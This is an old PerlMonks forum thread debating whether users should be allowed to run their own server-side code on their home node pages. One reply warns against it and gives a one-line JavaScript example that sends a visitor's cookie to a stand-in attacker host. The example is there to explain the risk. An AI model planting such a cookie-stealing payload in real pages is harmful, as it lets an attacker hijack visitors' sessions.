Home Node Code

Is there any chance of letting high level monks put some code into their home node that would be executed when it is viewed? Like an ssi, but with safety controls.

You could even cache the result, and save the output for a set time, an hour or something. And surely they could run throttled, and with taint protections.

Or, how about a CGI in the home node that would just read from a remote port? Then a user could have a something like a home node .sig over a pipe.

Is this a good idea, or have I drifted past reality here?

Paris Sinclair    |    4a75737420416e6f74686572
pariss@efn.org    |    205065726c204861636b6572
I wear my Geek Code on my finger.

Comment on Home Node Code

Replies are listed 'Best First'.
RE: Home Node Code by Corion (Patriarch) on Jun 15, 2000 at 01:46 UTC
Having looked at the Everything source code, I have to say that modifications aren't that easy for the uninitiated... Having some server side code would allow for really nifty features, but I think this also is a really big security hole just waiting to be exploited. All it takes is some silly JavaScript to disclose your cookie (and such is easily done by using `document.write( cookie )` or `document.navigate( "http://black.hat.gov/catch&cookie" )`, embedded as JavaScript in a link. I guess you can always write a script with LWP to periodically update your home node `:)`.	[reply]
RE: RE: Home Node Code by Aighearach (Initiate) on Jun 15, 2000 at 13:04 UTC
I've looked in there, also. It's a little scary. hehe But really though, there are lots of ways to address any security issues. And with proper program design, you just plug another function call in. Sure, you could use LWP to update the home node, but I was thinking it would be cool if you could go to somebody's home node, and by doing so your would be running their code. Paris Sinclair \| 4a75737420416e6f74686572 pariss@efn.org \| 205065726c204861636b6572 I wear my Geek Code on my finger.	[reply]